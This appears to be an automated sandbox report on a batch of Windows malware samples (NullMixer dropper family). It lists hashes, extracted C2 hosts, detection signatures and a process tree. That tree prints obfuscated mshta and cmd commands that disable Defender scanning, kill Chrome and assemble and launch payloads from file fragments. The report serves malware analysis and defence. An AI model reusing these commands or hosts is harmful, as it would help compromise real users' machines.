Overview
overview
10Static
static
10Samples 1/...cd.exe
windows7-x64
10Samples 1/...cd.exe
windows10-2004-x64
10Samples 1/...9f.exe
windows7-x64
10Samples 1/...9f.exe
windows10-2004-x64
7Samples 1/...95.exe
windows7-x64
10Samples 1/...95.exe
windows10-2004-x64
5Samples 1/...d2.exe
windows7-x64
10Samples 1/...d2.exe
windows10-2004-x64
10Samples 1/...6c.exe
windows7-x64
10Samples 1/...6c.exe
windows10-2004-x64
10Samples 1/...e8.exe
windows7-x64
10Samples 1/...e8.exe
windows10-2004-x64
10Samples 1/...4f.exe
windows7-x64
10Samples 1/...4f.exe
windows10-2004-x64
10Samples 1/...0a.exe
windows7-x64
7Samples 1/...0a.exe
windows10-2004-x64
7Samples 1/...a5.exe
windows7-x64
10Samples 1/...a5.exe
windows10-2004-x64
10Samples 1/...f4.exe
windows7-x64
10Samples 1/...f4.exe
windows10-2004-x64
10Samples 1/...c3.exe
windows7-x64
7Samples 1/...c3.exe
windows10-2004-x64
7Samples 1/...c7.exe
windows7-x64
10Samples 1/...c7.exe
windows10-2004-x64
10Samples 1/...26.exe
windows7-x64
10Samples 1/...26.exe
windows10-2004-x64
10Samples 1/...3a.exe
windows7-x64
1Samples 1/...3a.exe
windows10-2004-x64
1Samples 1/...91.exe
windows7-x64
10Samples 1/...91.exe
windows10-2004-x64
10Samples 2/...c4.exe
windows7-x64
10Samples 2/...c4.exe
windows10-2004-x64
10Analysis
-
max time kernel
0s -
max time network
157s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
07-01-2024 18:26
Static task
static1
Behavioral task
behavioral1
Sample
Samples 1/0d69cafe700a952a621c9b5981504e30c939c3d6cc34452691fce67b2eb6c1cd.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
Samples 1/0d69cafe700a952a621c9b5981504e30c939c3d6cc34452691fce67b2eb6c1cd.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral3
Sample
Samples 1/0dc8b4659b84d8d9b96e544279da980b36301253912a043b5e48c9bd7bb6e09f.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
Samples 1/0dc8b4659b84d8d9b96e544279da980b36301253912a043b5e48c9bd7bb6e09f.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral5
Sample
Samples 1/1d21da7ca3f1105e0fba4c64281c4199a1d2788bf2fd5ed975529e7a7ea6d695.exe
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
Samples 1/1d21da7ca3f1105e0fba4c64281c4199a1d2788bf2fd5ed975529e7a7ea6d695.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral7
Sample
Samples 1/1f2a3d598734fe566de2054f3c73fd2245fc6023f0740bdbae88a076f508ebd2.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
Samples 1/1f2a3d598734fe566de2054f3c73fd2245fc6023f0740bdbae88a076f508ebd2.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral9
Sample
Samples 1/2a6e81706ec02af2afc1254ac19dcf89203bc0cefd6d6df5cf57cd9c70526c6c.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
Samples 1/2a6e81706ec02af2afc1254ac19dcf89203bc0cefd6d6df5cf57cd9c70526c6c.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral11
Sample
Samples 1/2bee29bac294615a9d1b613ba775972cda26781938e3ae3aa60ad9737f1fbde8.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
Samples 1/2bee29bac294615a9d1b613ba775972cda26781938e3ae3aa60ad9737f1fbde8.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral13
Sample
Samples 1/2c17c6ecd63459b4442629093178ca786b4754244e1d879cef8520ce3e471d4f.exe
Resource
win7-20231215-en
Behavioral task
behavioral14
Sample
Samples 1/2c17c6ecd63459b4442629093178ca786b4754244e1d879cef8520ce3e471d4f.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral15
Sample
Samples 1/3bb40bab103c5f34e08a2c179ea379abd37d9861d7f6ac3d56d5c0d693b4260a.exe
Resource
win7-20231129-en
Behavioral task
behavioral16
Sample
Samples 1/3bb40bab103c5f34e08a2c179ea379abd37d9861d7f6ac3d56d5c0d693b4260a.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral17
Sample
Samples 1/3c36a35096a0e4ad330d8ae5953d844db3af5d0fa1780782a6a1adf32550fda5.exe
Resource
win7-20231215-en
Behavioral task
behavioral18
Sample
Samples 1/3c36a35096a0e4ad330d8ae5953d844db3af5d0fa1780782a6a1adf32550fda5.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral19
Sample
Samples 1/3c5720111b5562bdbcef0ac01a7d4fcf47ad75af43f84220129c0a1abb5e65f4.exe
Resource
win7-20231215-en
Behavioral task
behavioral20
Sample
Samples 1/3c5720111b5562bdbcef0ac01a7d4fcf47ad75af43f84220129c0a1abb5e65f4.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral21
Sample
Samples 1/3d52822949346df4385fc98bf246b67f2667b4959cf15e490072ba00bbff59c3.exe
Resource
win7-20231215-en
Behavioral task
behavioral22
Sample
Samples 1/3d52822949346df4385fc98bf246b67f2667b4959cf15e490072ba00bbff59c3.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral23
Sample
Samples 1/3f3c3378e66bb67a7d1c45784e1d297a086abfd7591268e65d90ad10bd12d1c7.exe
Resource
win7-20231215-en
Behavioral task
behavioral24
Sample
Samples 1/3f3c3378e66bb67a7d1c45784e1d297a086abfd7591268e65d90ad10bd12d1c7.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral25
Sample
Samples 1/4de3272c8195c4473cfa3c3abaaf682c7975ee0dc02f555fb5ac8588dcf3af26.exe
Resource
win7-20231215-en
Behavioral task
behavioral26
Sample
Samples 1/4de3272c8195c4473cfa3c3abaaf682c7975ee0dc02f555fb5ac8588dcf3af26.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral27
Sample
Samples 1/5cc02305d7b5cb0675f2ac65422a115aa44d8f28e5a2b759470d17d6bf851a3a.exe
Resource
win7-20231215-en
Behavioral task
behavioral28
Sample
Samples 1/5cc02305d7b5cb0675f2ac65422a115aa44d8f28e5a2b759470d17d6bf851a3a.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral29
Sample
Samples 1/5e6e5fe247e96c09a7297b32c31880847a6827762b9afdbb7d7b46e3c0071a91.exe
Resource
win7-20231215-en
Behavioral task
behavioral30
Sample
Samples 1/5e6e5fe247e96c09a7297b32c31880847a6827762b9afdbb7d7b46e3c0071a91.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral31
Sample
Samples 2/10f4e5b89953a29f22a64373ec33b585af9b406a18710fec96d3adab993cbcc4.exe
Resource
win7-20231215-en
Behavioral task
behavioral32
Sample
Samples 2/10f4e5b89953a29f22a64373ec33b585af9b406a18710fec96d3adab993cbcc4.exe
Resource
win10v2004-20231215-en
General
-
Target
Samples 1/0d69cafe700a952a621c9b5981504e30c939c3d6cc34452691fce67b2eb6c1cd.exe
-
Size
5.6MB
-
MD5
a121db3e0809289a5c41c44958ff6fa0
-
SHA1
fd40bbe6eaeea4004046f65a8c647fabb35e1742
-
SHA256
0d69cafe700a952a621c9b5981504e30c939c3d6cc34452691fce67b2eb6c1cd
-
SHA512
0e4af224ea67c07bdce0bae3b4040d900e2c011557ef55d8d0e68d596826561a8d4f3b553cc3290cf60e87ccee975deb65c1de9553fabfee5f67268935d8081f
-
SSDEEP
98304:JVw5AxSbnFouWDC50KmHeIQT8ZVK+zoN3aZdKfFEqsJtn05C5H+ZB3pjHOR:Ja5AeFeC5UH5a87/oN3aZdKNyxeCH+ZY
Malware Config
Extracted
nullmixer
http://hsiens.xyz/
Extracted
gcleaner
ppp-gl.biz
45.9.20.13
Signatures
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
OnlyLogger payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/2056-317-0x0000000000400000-0x00000000016D5000-memory.dmp family_onlylogger behavioral1/memory/2056-357-0x0000000000400000-0x00000000016D5000-memory.dmp family_onlylogger -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 7 ip-api.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process 2332 2640 WerFault.exe -
Kills process with taskkill 3 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exepid process 1624 taskkill.exe 844 taskkill.exe 1704 taskkill.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Samples 1\0d69cafe700a952a621c9b5981504e30c939c3d6cc34452691fce67b2eb6c1cd.exe"C:\Users\Admin\AppData\Local\Temp\Samples 1\0d69cafe700a952a621c9b5981504e30c939c3d6cc34452691fce67b2eb6c1cd.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri2050293ea5.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri2050293ea5.exeFri2050293ea5.exe2⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri2060ea1c5d8fae8aa.exeFri2060ea1c5d8fae8aa.exe1⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri208f5f140853548.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri208f5f140853548.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri208f5f140853548.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri208f5f140853548.exe") do taskkill /F -Im "%~NxU"2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F -Im "Fri208f5f140853548.exe"3⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\09xU.exE09xU.EXE -pPtzyIkqLZoCarb5ew3⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell").RUN( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri20ba391d4469.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF """" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri20ba391d4469.exe"" ) do taskkill /f /IM ""%~NxA"" ", 0, true ))1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri20ba391d4469.exe" > EUUIXyGKjuAj.exe&&STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 &IF ""=="" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri20ba391d4469.exe" ) do taskkill /f /IM "%~NxA"2⤵
-
C:\Users\Admin\AppData\Local\Temp\is-NDOT6.tmp\Fri20d5530575e8aa3ed.tmp"C:\Users\Admin\AppData\Local\Temp\is-NDOT6.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$50184,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri20d5530575e8aa3ed.exe"1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri20d5530575e8aa3ed.exe"C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri20d5530575e8aa3ed.exe" /SILENT2⤵
-
C:\Users\Admin\AppData\Local\Temp\is-03ANI.tmp\Fri20d5530575e8aa3ed.tmp"C:\Users\Admin\AppData\Local\Temp\is-03ANI.tmp\Fri20d5530575e8aa3ed.tmp" /SL5="$60184,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri20d5530575e8aa3ed.exe" /SILENT1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri20fbc038b0b02ea.exeC:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri20fbc038b0b02ea.exe1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBSCript: CLose ( CrEAteOBjeCT ( "wsCrIPt.SHell").RUN( "CmD /Q /c TYPe ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" > EUUIXyGKjuAj.exe && STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 & IF ""/pkrs9YKWRf3sVprfXBE2vA2Yg3 "" == """" for %A iN ( ""C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe"" ) do taskkill /f /IM ""%~NxA"" ", 0, true ))1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /c TYPe "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" > EUUIXyGKjuAj.exe&&STart EUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg3 &IF "/pkrs9YKWRf3sVprfXBE2vA2Yg3 "=="" for %A iN ( "C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe" ) do taskkill /f /IM "%~NxA"2⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R eCHo | sET /P = "MZ" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W +pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT+lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ1⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec /Y .\6~iPCLZ.rJ2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" sET /P = "MZ" 1>nQBnLF9A.W"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHo "2⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I1⤵
-
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2640 -s 4801⤵
- Program crash
-
C:\Windows\SysWOW64\control.execontrol .\R6f7sE.I1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" eCHO "1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbsCript:CloSE ( CreAtEoBjEct( "WscRiPt.ShElL" ).RUN ( "C:\Windows\system32\cmd.exe /R eCHo | sET /P = ""MZ"" >nQBnLF9A.W & cOPy /b /y NQBNLF9A.W +pajqYZJ.O + NuWKOG5W.G+ 6QI2.~ + R4QR.JT +lFAf.j 6~IPcLZ.rj & sTaRT msiexec /Y .\6~iPCLZ.rJ " , 0 , tRUE ) )1⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /IM "Fri20ba391d4469.exe"1⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exeEUUIXYgKJuAJ.EXE /pkrs9YKWRf3sVprfXBE2vA2Yg31⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri20e095683c2b3a0c.exeFri20e095683c2b3a0c.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri208f5f140853548.exeFri208f5f140853548.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri20c0c46650eeb2a.exeFri20c0c46650eeb2a.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri209d5bfbb2.exeFri209d5bfbb2.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri20fbc038b0b02ea.exeFri20fbc038b0b02ea.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri2002ce5f91c761.exeFri2002ce5f91c761.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri20d5530575e8aa3ed.exeFri20d5530575e8aa3ed.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri209f6924af86d795.exeFri209f6924af86d795.exe /mixone1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri200ae385720d3.exeFri200ae385720d3.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri20109b9e174d0fc.exeFri20109b9e174d0fc.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri20ba391d4469.exeFri20ba391d4469.exe1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri2060ea1c5d8fae8aa.exe1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri209d5bfbb2.exe1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri20e095683c2b3a0c.exe1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri20fbc038b0b02ea.exe1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri208f5f140853548.exe1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri209c4b463b.exe1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri20c0c46650eeb2a.exe1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri2002ce5f91c761.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\Fri20ee0a6fe195bd09.exeFri20ee0a6fe195bd09.exe1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri20d5530575e8aa3ed.exe1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri20ba391d4469.exe1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri209f6924af86d795.exe /mixone1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri200ae385720d3.exe1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri20ee0a6fe195bd09.exe1⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Fri20109b9e174d0fc.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS8051CA36\setup_install.exe"1⤵
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\wwwduvwFilesize
294KB
MD57d44a083f0e81baf1ecb264b93bdc9a5
SHA14dd23b40065e2ccfbdd4c79386d7e2d37a53efce
SHA256073b1354e582f8fd758bd128d764fd305d50d76fc45147eb1240e8a402ed1da5
SHA512245827096522beb8b54a60ad3549cd7509ab35fe650cb2f7d6b48f4cf76430c25c3162ff284d78b19d2351457bbfbd0d2d71751abeb703fef3e2736ab6825c82
-
\Users\Admin\AppData\Local\Temp\setup_installer.exeMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/856-158-0x0000000000400000-0x00000000004BD000-memory.dmpFilesize
756KB
-
memory/1216-266-0x0000000002DD0000-0x0000000002DE6000-memory.dmpFilesize
88KB
-
memory/1388-638-0x0000000002CA0000-0x0000000002D4B000-memory.dmpFilesize
684KB
-
memory/1408-163-0x0000000001170000-0x00000000011E2000-memory.dmpFilesize
456KB
-
memory/1524-139-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/1524-161-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/1556-166-0x00000000011A0000-0x00000000011B8000-memory.dmpFilesize
96KB
-
memory/1556-175-0x00000000003E0000-0x00000000003E6000-memory.dmpFilesize
24KB
-
memory/1604-198-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/1604-159-0x0000000000400000-0x0000000000414000-memory.dmpFilesize
80KB
-
memory/1608-623-0x0000000000AC0000-0x0000000000B6E000-memory.dmpFilesize
696KB
-
memory/1608-360-0x0000000000EF0000-0x0000000000F85000-memory.dmpFilesize
596KB
-
memory/1608-358-0x0000000000BC0000-0x0000000000C68000-memory.dmpFilesize
672KB
-
memory/1608-224-0x0000000002AB0000-0x0000000002CD9000-memory.dmpFilesize
2.2MB
-
memory/1608-361-0x0000000002AB0000-0x0000000002CD9000-memory.dmpFilesize
2.2MB
-
memory/1608-231-0x0000000002E20000-0x0000000002F5E000-memory.dmpFilesize
1.2MB
-
memory/1608-365-0x0000000000EF0000-0x0000000000F85000-memory.dmpFilesize
596KB
-
memory/1608-232-0x0000000000AC0000-0x0000000000B6E000-memory.dmpFilesize
696KB
-
memory/1632-321-0x0000000000400000-0x00000000004BD000-memory.dmpFilesize
756KB
-
memory/1896-219-0x0000000000250000-0x0000000000259000-memory.dmpFilesize
36KB
-
memory/1896-218-0x0000000001B00000-0x0000000001C00000-memory.dmpFilesize
1024KB
-
memory/1896-222-0x0000000000400000-0x00000000016BC000-memory.dmpFilesize
18.7MB
-
memory/1896-267-0x0000000000400000-0x00000000016BC000-memory.dmpFilesize
18.7MB
-
memory/1956-228-0x000000001B220000-0x000000001B2A0000-memory.dmpFilesize
512KB
-
memory/1956-645-0x000000001B220000-0x000000001B2A0000-memory.dmpFilesize
512KB
-
memory/1956-639-0x000007FEF5EF0000-0x000007FEF68DC000-memory.dmpFilesize
9.9MB
-
memory/1956-141-0x0000000000BA0000-0x0000000000BA8000-memory.dmpFilesize
32KB
-
memory/1956-195-0x000007FEF5EF0000-0x000007FEF68DC000-memory.dmpFilesize
9.9MB
-
memory/2036-246-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/2036-245-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/2036-264-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/2036-260-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/2036-244-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/2036-258-0x000000007EFDE000-0x000000007EFDF000-memory.dmpFilesize
4KB
-
memory/2036-247-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/2036-262-0x0000000000400000-0x0000000000422000-memory.dmpFilesize
136KB
-
memory/2056-227-0x0000000000400000-0x00000000016D5000-memory.dmpFilesize
18.8MB
-
memory/2056-317-0x0000000000400000-0x00000000016D5000-memory.dmpFilesize
18.8MB
-
memory/2056-197-0x0000000000250000-0x0000000000299000-memory.dmpFilesize
292KB
-
memory/2056-196-0x00000000017C0000-0x00000000018C0000-memory.dmpFilesize
1024KB
-
memory/2056-642-0x00000000017C0000-0x00000000018C0000-memory.dmpFilesize
1024KB
-
memory/2056-357-0x0000000000400000-0x00000000016D5000-memory.dmpFilesize
18.8MB
-
memory/2640-81-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/2640-90-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/2640-311-0x0000000000400000-0x000000000051C000-memory.dmpFilesize
1.1MB
-
memory/2640-313-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/2640-315-0x000000006EB40000-0x000000006EB63000-memory.dmpFilesize
140KB
-
memory/2640-316-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/2640-314-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/2640-83-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/2640-312-0x0000000064940000-0x0000000064959000-memory.dmpFilesize
100KB
-
memory/2640-85-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/2640-92-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/2640-89-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/2640-88-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/2640-87-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/2640-84-0x000000006FE40000-0x000000006FFC6000-memory.dmpFilesize
1.5MB
-
memory/2640-82-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/2640-79-0x000000006B440000-0x000000006B4CF000-memory.dmpFilesize
572KB
-
memory/2640-74-0x000000006B280000-0x000000006B2A6000-memory.dmpFilesize
152KB
-
memory/2848-200-0x0000000000260000-0x0000000000290000-memory.dmpFilesize
192KB
-
memory/2848-223-0x0000000003370000-0x00000000033B0000-memory.dmpFilesize
256KB
-
memory/2848-199-0x00000000017D0000-0x00000000018D0000-memory.dmpFilesize
1024KB
-
memory/2848-643-0x00000000017D0000-0x00000000018D0000-memory.dmpFilesize
1024KB
-
memory/2848-177-0x00000000019D0000-0x00000000019F2000-memory.dmpFilesize
136KB
-
memory/2848-208-0x0000000000400000-0x00000000016E0000-memory.dmpFilesize
18.9MB
-
memory/2848-174-0x0000000001780000-0x00000000017A4000-memory.dmpFilesize
144KB
-
memory/2852-229-0x0000000073B90000-0x000000007413B000-memory.dmpFilesize
5.7MB
-
memory/2852-176-0x0000000073B90000-0x000000007413B000-memory.dmpFilesize
5.7MB
-
memory/2852-211-0x0000000002870000-0x00000000028B0000-memory.dmpFilesize
256KB
-
